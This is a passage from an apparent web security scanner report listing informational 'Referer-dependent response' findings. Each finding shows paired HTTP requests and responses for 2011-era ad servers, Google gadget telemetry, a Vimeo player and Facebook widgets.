SECONDARY_TEXT_COLOR%22:%22%23000000%22,%22CONTENT_HEADLINE_COLOR%22:%22%23050c10%22,%22FONT_FACE%22:%22normal+normal+20px+Arial,+Tahoma,+Helvetica,+FreeSans,+sans-serif;%22%7D%7D&communityId=09528749658452737714&caller=http://orangeorb.blogspot.com/2011/05/planets-align-on-friday-13th-and.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 1

HTTP/1.1 413 Request Entity Too Large
Date: Thu, 12 May 2011 13:34:06 GMT
Content-Type: text/html
Content-Length: 0
Server: GFE/2.0

Request 2

GET /csi?v=3&s=opensocial-gadgets&action=peoplesense_profile&srt=6760&tran=0&gadget=http%3A%2F%2Ffcgadgets.appspot.com%2Fspec%2Fshareit.xml&container=peoplesense&view=profile&ClickTrackGadgetRewriter=false&CsiSample=true&ContentDivGadgetRewriter=false&StyleAdjacencyGadgetRewriter=true&HtmlParser=control&DflagsJsDebugGadgetRewriter=true&ResourceUsageJsDebugGadgetRewriter=true&JsSubVersion=control&YtVideoUrlGadgetRewriter=true&GadgetBlacklist=control&LogResources=false&DynamicHeightGadgetRewriter=true&StyleTagExtractorGadgetRewriter=true&ErrorCodesToLog=control&AdsUrlGadgetRewriter=true&MiniMessageGadgetRewriter=true&Monkeypatch=control&ProxyingGadgetRewriter=true&TimeSecsSinceEpochEnvGadgetRewriter=true&TrackResources=false&UseETags=false&UseUrlGadgetWhitelist=false&AnalyticsGadgetRewriter=true&GmailSkinsGadgetRewriter=true&e=CsiSample,StyleAdjacencyGadgetRewriter,DflagsJsDebugGadgetRewriter,ResourceUsageJsDebugGadgetRewriter,YtVideoUrlGadgetRewriter,DynamicHeightGadgetRewriter,StyleTagExtractorGadgetRewriter,AdsUrlGadgetRewriter,MiniMessageGadgetRewriter,ProxyingGadgetRewriter,TimeSecsSinceEpochEnvGadgetRewriter,AnalyticsGadgetRewriter,GmailSkinsGadgetRewriter&rt=ol.57947,prt.57947 HTTP/1.1
Host: csi.gstatic.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 2

HTTP/1.1 204 No Content
Content-Length: 0
Date: Wed, 21 Jan 2004 19:51:30 GMT
Pragma: no-cache
Cache-Control: private, no-cache
Expires: Wed, 17 Sep 1975 21:32:10 GMT
Content-Type: image/gif
Server: Golfe

11.9. http://mads.com.com/mac-ad  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://mads.com.com
Path:   /mac-ad

Request 1

GET /mac-ad?&_RGROUP=13038&&CNET-BRAND-ID=2&HUB=cn&PTNR=2&LOCALE=en_US&CNET-SITE-ID=2&ASSET_HOST=adimg.com.com&&&&&&&ENG:DATETIME=2011.05.12.09.28.27&SYS:RQID=01phx1-ad-e19:4DCB7A2656E16D&&REFER_HOST=tag.admeld.com&&&&&&&adfile=7074/11/445195_wc.ca HTTP/1.1
Host: mads.com.com
Proxy-Connection: keep-alive
Referer: http://mads.com.com/mac-ad?CELT=ifc&BRAND=2&SITE=2&ADSTYLE=NOOVERGIF&_RGROUP=13038
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: XCLGFbrowser=Cg8JIk24ijttAAAASDs

Response 1

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 13:28:32 GMT
Server: Apache/2.2
Pragma: no-cache
Cache-Control: no-cache, must-revalidate
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-15
Expires: Thu, 12 May 2011 13:28:32 GMT
Content-Length: 3958

<!-- MAC ad --><html><head><style type="text/css">body {background-color:transparent;}</style></head>
<body>

<script type="text/javascript" src="http://adimg.com.com/Ads/common/js_common/AC_OETags
...[SNIP]...
%2Ecom%2Ecom%2Fadlog%2Fe%2Fr%3D13038%26sg%3D445195%26o%3D%26h%3Dcn%26p%3D2%26b%3D2%26l%3Den_US%26site%3D2%26pt%3D%26nd%3D%26pid%3D%26cid%3D%26pp%3D%26e%3D%26rqid%3D01phx1-ad-e19:4DCB7A2656E16D%26orh%3Dcom.com%26oepartner%3D%26epartner%3D%26ppartner%3D%26pdom%3Dtag.admeld.com%26cpnmodule%3D%26count%3D%26ra%3D173%2e193%2e214%2e243%26pg%3D%26t%3D2011.05.12.13.28.32&r3=http://i.i.com.com/cnwk.1d/Ads/7074/11/&cp=http://i.i.com.com/cnwk.1d/Ads/common/flashtrak/0106/&exitURL1=&&variablesURL=http%3A%2F%2Fpandora.cnet.com%2Fapi%2Frest%2Fdynamicdata%2Fv3%2F%3Fmode%3Dpreview%26key%3D2n540drqg0i_2",
       "menu","false",
       "scale","noscale",
       "loop","true",
       "play","true",
       "wmode","opaque",
       "name", "445195",
       "allowScriptAccess","always",
       "type", "application/x-shockwave-flash",
       "codebase", "http://fpdownload.macromedia.com/get/flashplayer/current/swflash.cab"
   );
   document.write('<br /><img src="http://adlog.com.com/adlog/e/r=13038&amp;sg=445195&amp;o=&amp;h=cn&amp;p=2&amp;b=2&amp;l=en_US&amp;site=2&amp;pt=&amp;nd=&amp;pid=&amp;cid=&amp;pp=&amp;e=&amp;rqid=01phx1-ad-e19:4DCB7A2656E16D&amp;orh=com.com&amp;oepartner=&amp;epartner=&amp;ppartner=&amp;pdom=tag.admeld.com&amp;cpnmodule=&amp;count=&amp;ra=173%2e193%2e214%2e243&amp;pg=&amp;t=2011.05.12.13.28.32&event=19/http://i.i.com.com/cnwk.1d/Ads/common/dotclear.gif" height="1" width="1" />');
} else { // flash is too old or we can't detect the plugin
   var alternateContent = '<a href="http://adlog.com.com/adlog/c/r=13038&amp;sg=445195&amp;o=&amp;h=cn&amp;p=2&amp;b=2&amp;l=en_US&amp;site=2&amp;pt=&amp;nd=&amp;pid=&amp;cid=&amp;pp=&amp;e=&amp;rqid=01phx1-ad-e19:4DCB7A2656E16D&amp;orh=com.com&amp;oepartner=&amp;epartner=&amp;ppartner=&amp;pdom=tag.admeld.com&amp;cpnmodule=&amp;count=&amp;ra=173%2e193%2e214%2e243&amp;pg=&amp;t=2011.05.12.13.28.32/http://www.bnet.com" target="_blank"><img src="http://i.i.com.com/cnwk.1d/Ads/7074/11/mw_carouselBackup.jpg" width="300" height="250" border="0" alt="Click Here!" /></a>';
   document.write(alternateContent); // insert non-flash content
}
// -->
</script>
<noscript><a href="http://adlog.com.com/adlog/c/r=13038&amp;sg=445195&amp;o=&amp;h=cn&amp;p=2&
...[SNIP]...

Request 2

GET /mac-ad?&_RGROUP=13038&&CNET-BRAND-ID=2&HUB=cn&PTNR=2&LOCALE=en_US&CNET-SITE-ID=2&ASSET_HOST=adimg.com.com&&&&&&&ENG:DATETIME=2011.05.12.09.28.27&SYS:RQID=01phx1-ad-e19:4DCB7A2656E16D&&REFER_HOST=tag.admeld.com&&&&&&&adfile=7074/11/445195_wc.ca HTTP/1.1
Host: mads.com.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: XCLGFbrowser=Cg8JIk24ijttAAAASDs

Response 2

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 13:29:15 GMT
Server: Apache/2.2
Pragma: no-cache
Cache-Control: no-cache, must-revalidate
Vary: Accept-Encoding
Content-Type: text/html; charset=iso-8859-15
Expires: Thu, 12 May 2011 13:29:15 GMT
Content-Length: 3931

<!-- MAC ad --><html><head><style type="text/css">body {background-color:transparent;}</style></head>
<body>

<script type="text/javascript" src="http://adimg.com.com/Ads/common/js_common/AC_OETags
...[SNIP]...
%2Ecom%2Ecom%2Fadlog%2Fe%2Fr%3D13038%26sg%3D445195%26o%3D%26h%3Dcn%26p%3D2%26b%3D2%26l%3Den_US%26site%3D2%26pt%3D%26nd%3D%26pid%3D%26cid%3D%26pp%3D%26e%3D%26rqid%3D01phx1-ad-e19:4DCB7A2656E16D%26orh%3D%26oepartner%3D%26epartner%3D%26ppartner%3D%26pdom%3Dtag.admeld.com%26cpnmodule%3D%26count%3D%26ra%3D173%2e193%2e214%2e243%26pg%3D%26t%3D2011.05.12.13.29.15&r3=http://i.i.com.com/cnwk.1d/Ads/7074/11/&cp=http://i.i.com.com/cnwk.1d/Ads/common/flashtrak/0106/&exitURL1=&&variablesURL=http%3A%2F%2Fpandora.cnet.com%2Fapi%2Frest%2Fdynamicdata%2Fv3%2F%3Fmode%3Dpreview%26key%3D2n540drqg0i_2",
       "menu","false",
       "scale","noscale",
       "loop","true",
       "play","true",
       "wmode","opaque",
       "name", "445195",
       "allowScriptAccess","always",
       "type", "application/x-shockwave-flash",
       "codebase", "http://fpdownload.macromedia.com/get/flashplayer/current/swflash.cab"
   );
   document.write('<br /><img src="http://adlog.com.com/adlog/e/r=13038&amp;sg=445195&amp;o=&amp;h=cn&amp;p=2&amp;b=2&amp;l=en_US&amp;site=2&amp;pt=&amp;nd=&amp;pid=&amp;cid=&amp;pp=&amp;e=&amp;rqid=01phx1-ad-e19:4DCB7A2656E16D&amp;orh=&amp;oepartner=&amp;epartner=&amp;ppartner=&amp;pdom=tag.admeld.com&amp;cpnmodule=&amp;count=&amp;ra=173%2e193%2e214%2e243&amp;pg=&amp;t=2011.05.12.13.29.15&event=19/http://i.i.com.com/cnwk.1d/Ads/common/dotclear.gif" height="1" width="1" />');
} else { // flash is too old or we can't detect the plugin
   var alternateContent = '<a href="http://adlog.com.com/adlog/c/r=13038&amp;sg=445195&amp;o=&amp;h=cn&amp;p=2&amp;b=2&amp;l=en_US&amp;site=2&amp;pt=&amp;nd=&amp;pid=&amp;cid=&amp;pp=&amp;e=&amp;rqid=01phx1-ad-e19:4DCB7A2656E16D&amp;orh=&amp;oepartner=&amp;epartner=&amp;ppartner=&amp;pdom=tag.admeld.com&amp;cpnmodule=&amp;count=&amp;ra=173%2e193%2e214%2e243&amp;pg=&amp;t=2011.05.12.13.29.15/http://www.bnet.com" target="_blank"><img src="http://i.i.com.com/cnwk.1d/Ads/7074/11/mw_carouselBackup.jpg" width="300" height="250" border="0" alt="Click Here!" /></a>';
   document.write(alternateContent); // insert non-flash content
}
// -->
</script>
<noscript><a href="http://adlog.com.com/adlog/c/r=13038&amp;sg=445195&amp;o=&amp;h=cn&amp;p=2&amp;b=2&amp;l=en_US&a
...[SNIP]...
11.10. http://network.alluremedia.com.au/network/www/delivery/afr.php  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://network.alluremedia.com.au
Path:   /network/www/delivery/afr.php

Request 1

GET /network/www/delivery/afr.php?zoneid=10&cb=INSERT_RANDOM_NUMBER_HERE&category=editorialbox&tags=azure HTTP/1.1
Host: network.alluremedia.com.au
Proxy-Connection: keep-alive
Referer: http://www.gizmodo.com.au/2011/05/google-chrome-os-lands-on-hardware-you-can-actually-buy/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAID=6e25a061f3c7b9bf0c10b0e4c1bafdc6

Response 1

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 13:31:08 GMT
Server: Apache/2.2.9
X-Powered-By: PHP/5.2.6-1+lenny10
Pragma: no-cache
Cache-Control: private, max-age=0, no-cache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
P3P: CP="CUR ADM OUR NOR STA NID"
Vary: Accept-Encoding
Set-Cookie: OAID=6e25a061f3c7b9bf0c10b0e4c1bafdc6; expires=Fri, 11-May-2012 13:31:08 GMT; path=/
X-Mod-Pagespeed: 0.9.16.9-576
Cache-Control: max-age=0, no-cache, no-store
Content-Type: text/html; charset=UTF-8
Content-Length: 1042

<!DOCTYPE html PUBLIC '-//W3C//DTD XHTML 1.0 Transitional//EN' 'http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd'>
<html xmlns='http://www.w3.org/1999/xhtml' xml:lang='en' lang='en'>
<head>
<ti
...[SNIP]...
<a href='ck.php?oaparams=2__bannerid=104__zoneid=10__cb=e78cde9ba8__oadest=http%3A%2F%2Fclk.atdmt.com%2FAUM%2Fgo%2F311522198%2Fdirect%2F01%2F' target='_new'><img src='/network/www/images/75ddd70e03ccb305c9c89467c286e756.gif.pagespeed.ce.dd3XDgPMsw.gif' width='124' height='20' alt='' title='' border='0'/></a><div id='beacon_e78cde9ba8' style='position: absolute; left: 0px; top: 0px; visibility: hidden;'><img src='lg.php?bannerid=104&amp;campaignid=59&amp;zoneid=10&amp;loc=http%3A%2F%2Fwww.gizmodo.com.au%2F2011%2F05%2Fgoogle-chrome-os-lands-on-hardware-you-can-actually-buy%2F&amp;cb=e78cde9ba8' width='0' height='0' alt='' style='width: 0px; height: 0px;'/></div>
</body>
</html>

Request 2

GET /network/www/delivery/afr.php?zoneid=10&cb=INSERT_RANDOM_NUMBER_HERE&category=editorialbox&tags=azure HTTP/1.1
Host: network.alluremedia.com.au
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAID=6e25a061f3c7b9bf0c10b0e4c1bafdc6

Response 2

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 13:31:38 GMT
Server: Apache/2.2.9
X-Powered-By: PHP/5.2.6-1+lenny10
Pragma: no-cache
Cache-Control: private, max-age=0, no-cache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
P3P: CP="CUR ADM OUR NOR STA NID"
Vary: Accept-Encoding
Set-Cookie: OAID=6e25a061f3c7b9bf0c10b0e4c1bafdc6; expires=Fri, 11-May-2012 13:31:38 GMT; path=/
X-Mod-Pagespeed: 0.9.16.9-576
Cache-Control: max-age=0, no-cache, no-store
Content-Type: text/html; charset=UTF-8
Content-Length: 929

<!DOCTYPE html PUBLIC '-//W3C//DTD XHTML 1.0 Transitional//EN' 'http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd'>
<html xmlns='http://www.w3.org/1999/xhtml' xml:lang='en' lang='en'>
<head>
<ti
...[SNIP]...
<a href='ck.php?oaparams=2__bannerid=104__zoneid=10__cb=3601b4a428__oadest=http%3A%2F%2Fclk.atdmt.com%2FAUM%2Fgo%2F311522198%2Fdirect%2F01%2F' target='_new'><img src='/network/www/images/75ddd70e03ccb305c9c89467c286e756.gif.pagespeed.ce.dd3XDgPMsw.gif' width='124' height='20' alt='' title='' border='0'/></a><div id='beacon_3601b4a428' style='position: absolute; left: 0px; top: 0px; visibility: hidden;'><img src='lg.php?bannerid=104&amp;campaignid=59&amp;zoneid=10&amp;cb=3601b4a428' width='0' height='0' alt='' style='width: 0px; height: 0px;'/></div>
</body>
</html>
11.11. http://vimeo.com/moogaloop.swf  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://vimeo.com
Path:   /moogaloop.swf

Request 1

GET /moogaloop.swf?clip_id=7013723&server=vimeo.com&show_title=1&show_byline=1&show_portrait=0&color=&fullscreen=1 HTTP/1.1
Host: vimeo.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.pubmatic.com/category/blog

Response 1

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 13:34:36 GMT
Server: Apache
X-Powered-By: PHP/5.3.5-0.dotdeb.0
Expires: Thu, 12 May 2011 01:34:36 GMT
X-Server: 10.90.128.69
Vary: Accept-Encoding
Connection: close
Content-Type: application/x-shockwave-flash
Content-Length: 292

FWS.$...p...........?........
.http%3A%2F%2Fwww.pubmatic.com%2Fcategory%2Fblog.embed_location.moogaloop.moogaloop_type.player.vimeo.com.player_server.a.vimeocdn.com.cdn_server.http://a.vimeocdn.com/p/flash/moogaloop/5.1.14/moogaloop.swf._root........<.......<.......<.......<......    ....A.@...

Request 2

GET /moogaloop.swf?clip_id=7013723&server=vimeo.com&show_title=1&show_byline=1&show_portrait=0&color=&fullscreen=1 HTTP/1.1
Host: vimeo.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive

Response 2

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 13:34:36 GMT
Server: Apache
X-Powered-By: PHP/5.3.3
Expires: Thu, 12 May 2011 01:34:36 GMT
X-Server: 10.90.6.237
Vary: Accept-Encoding
Connection: close
Content-Type: application/x-shockwave-flash
Content-Length: 245

FWS.....p...........?........
..embed_location.moogaloop.moogaloop_type.player.vimeo.com.player_server.a.vimeocdn.com.cdn_server.http://a.vimeocdn.com/p/flash/moogaloop/5.1.14/moogaloop.swf._root........<.......<.......<.......<......    ....A.@...
11.12. http://www.facebook.com/plugins/activity.php  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.facebook.com
Path:   /plugins/activity.php

Request 1

GET /plugins/activity.php?site=zdnet.com&width=300&height=350&header=false&colorscheme=light&recommendations=false HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.zdnet.com/blog/computers/can-intel-cedar-trail-atom-processors-along-with-google-chromebooks-resurrect-the-netbook/5773
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; datr=ituyTcnawc6q7VcE0gibPCo2

Response 1

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.27.77.109
X-Cnection: close
Date: Thu, 12 May 2011 13:28:26 GMT
Content-Length: 13301

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
<input name="partner_id" value="zdnet.com" type="hidden" /><input name="placement" value="activity" type="hidden" /><input name="extra_1" value="http://www.zdnet.com/blog/computers/can-intel-cedar-trail-atom-processors-along-with-google-chromebooks-resurrect-the-netbook/5773" type="hidden" /><input name="extra_2" value="US" type="hidden" /><label class="mrm fbLoginButton uiButton uiButtonSpecial uiButtonLarge" for="u690673_3"><input value="Sign Up" type="submit" id="u690673_3" /></label></form><div class="ConnectActivityLoginMessage">Create an account or <a onclick="ConnectSocialWidget.getInstance(&quot;u690672_1&quot;).login();"><b>log in</b></a> to see what your friends are doing.</div></div><div class="fbConnectWidgetContent phs pts"><div class="fbActivityWidgetContainer"><div class="mhs fbEmptyWidget fbWidgetTitle hidden_elem"><div class="mbs">No recent activity to display.</div></div><div class="fbFriendsActivity fbSocial fbToggleLogin"></div></div><div id="u690672_2"><div class="fbSeparator hidden_elem fbRecommendationsSeparator"></div><div class="fbRecommendationWidgetContent"><div class="UIImageBlock clearfix pas fbRecommendation RES_4804326f1e84053e"><a class="fbImageContainer fbMonitor UIImageBlock_Image UIImageBlock_SMALL_Image" href="http://www.zdnet.com/blog/microsoft/microsoft-buys-skype-for-85-billion-creates-new-business-division/9406" title="Microsoft buys Skype for $8.5 billion; creates new business division | ZDNet" target="_top"><img class="img" src="http://i.zdnet.com/gallery/413193-130-92.jpg" /></a><div class="UIImageBlock_Content UIImageBlock_SMALL_Content"><strong><a class="fbMonitor" href="http://www.zdnet.com/blog/microsoft/microsoft-buys-skype-for-85-billion-creates-new-business-division/9406" target="_top">Microsoft buys Skype for $8.5 billion; creates new business division | ZDNet</a></strong><div class="recommendations_metadata">1,346 people shared this.</div></div></div><div class="UIImageBlock clearfix pas fbRecommendation RES_6580c62a405c15a6"><a class="fbImageCon
...[SNIP]...

Request 2

GET /plugins/activity.php?site=zdnet.com&width=300&height=350&header=false&colorscheme=light&recommendations=false HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; datr=ituyTcnawc6q7VcE0gibPCo2

Response 2

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.27.66.113
X-Cnection: close
Date: Thu, 12 May 2011 13:28:58 GMT
Content-Length: 13116

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
<input name="partner_id" value="" type="hidden" /><input name="placement" value="activity" type="hidden" /><input name="extra_2" value="US" type="hidden" /><label class="mrm fbLoginButton uiButton uiButtonSpecial uiButtonLarge" for="u693868_3"><input value="Sign Up" type="submit" id="u693868_3" /></label></form><div class="ConnectActivityLoginMessage">Create an account or <a onclick="ConnectSocialWidget.getInstance(&quot;u693868_1&quot;).login();"><b>log in</b></a> to see what your friends are doing.</div></div><div class="fbConnectWidgetContent phs pts"><div class="fbActivityWidgetContainer"><div class="mhs fbEmptyWidget fbWidgetTitle hidden_elem"><div class="mbs">No recent activity to display.</div></div><div class="fbFriendsActivity fbSocial fbToggleLogin"></div></div><div id="u693868_2"><div class="fbSeparator hidden_elem fbRecommendationsSeparator"></div><div class="fbRecommendationWidgetContent"><div class="UIImageBlock clearfix pas fbRecommendation RES_5791775b736e83b7"><a class="fbImageContainer fbMonitor UIImageBlock_Image UIImageBlock_SMALL_Image" href="http://www.zdnet.com/blog/microsoft/microsoft-buys-skype-for-85-billion-creates-new-business-division/9406" title="Microsoft buys Skype for $8.5 billion; creates new business division | ZDNet" target="_top"><img class="img" src="http://i.zdnet.com/gallery/413193-130-92.jpg" /></a><div class="UIImageBlock_Content UIImageBlock_SMALL_Content"><strong><a class="fbMonitor" href="http://www.zdnet.com/blog/microsoft/microsoft-buys-skype-for-85-billion-creates-new-business-division/9406" target="_top">Microsoft buys Skype for $8.5 billion; creates new business division | ZDNet</a></strong><div class="recommendations_metadata">1,346 people shared this.</div></div></div><div class="UIImageBlock clearfix pas fbRecommendation RES_7a15831e2db6932f"><a class="fbImageContainer fbMonitor UIImageBlock_Image UIImageBlock_SMALL_Image" href="http://www.zdnet.com/blog/security/osama-execution-video-scam-spreading-on-facebook/8607" title="Osama execution video
...[SNIP]...
11.13. http://www.facebook.com/plugins/like.php  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.facebook.com
Path:   /plugins/like.php

Request 1

GET /plugins/like.php?href=http%3A%2F%2Fwww.zdnet.com%2Fblog%2Fcomputers%2Fcan-intel-cedar-trail-atom-processors-along-with-google-chromebooks-resurrect-the-netbook%2F5773&layout=standard&show_faces=false&width=450&action=like&colorscheme=light&height=40 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.zdnet.com/blog/computers/can-intel-cedar-trail-atom-processors-along-with-google-chromebooks-resurrect-the-netbook/5773
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; datr=ituyTcnawc6q7VcE0gibPCo2

Response 1

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.27.215.129
X-Cnection: close
Date: Thu, 12 May 2011 13:28:02 GMT
Content-Length: 8926

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
<div id="connect_widget_4dcbe061f3deb4d75816455" class="connect_widget" style=""><table class="connect_widget_interactive_area"><tr><td class="connect_widget_vertical_center connect_widget_button_cell"><div class="connect_button_slider" style=""><div class="connect_button_container"><a class="connect_widget_like_button clearfix like_button_no_like"><div class="tombstone_cross"></div><span class="liketext">Like</span></a></div></div></td><td class="connect_widget_vertical_center"><span class="connect_widget_confirm_span hidden_elem"><a class="mrm connect_widget_confirm_link">Confirm</a></span></td><td class="connect_widget_vertical_center"><div class="connect_confirmation_cell connect_confirmation_cell_no_like"><div class="connect_widget_text_summary connect_text_wrapper"><span class="connect_widget_facebook_favicon"></span><span class="connect_widget_user_action connect_widget_text hidden_elem">You like this.<span class="unlike_span hidden_elem"><a class="connect_widget_unlike_link"></a></span><span class="connect_widget_share_comment_span hidden_elem">&nbsp;&middot;&nbsp;<a class="connect_widget_share_comment_option">Add Comment</a></span><span class="connect_widget_admin_span hidden_elem">&nbsp;&middot;&nbsp;<a class="connect_widget_admin_option">Admin Page</a><span class="connect_widget_insights_span hidden_elem">&nbsp;&middot;&nbsp;<a class="connect_widget_insights_link">Insights</a></span></span><span class="connect_widget_error_span hidden_elem">&nbsp;&middot;&nbsp;<a class="connect_widget_error_text">Error</a></span></span><span class="connect_widget_summary connect_widget_text"><span class="connect_widget_connected_text hidden_elem">You like this</span><span class="connect_widget_not_connected_text"><a href="/campaign/landing.php?campaign_id=137675572948107&amp;partner_id=zdnet.com&amp;placement=like_button&amp;extra_1=http%3A%2F%2Fwww.zdnet.com%2Fblog%2Fcomputers%2Fcan-intel-cedar-trail-atom-processors-along-with-google-chromebooks-resurrect-the-netbook%2F5773&amp;extra_2=US" target="_bl
...[SNIP]...

Request 2

GET /plugins/like.php?href=http%3A%2F%2Fwww.zdnet.com%2Fblog%2Fcomputers%2Fcan-intel-cedar-trail-atom-processors-along-with-google-chromebooks-resurrect-the-netbook%2F5773&layout=standard&show_faces=false&width=450&action=like&colorscheme=light&height=40 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
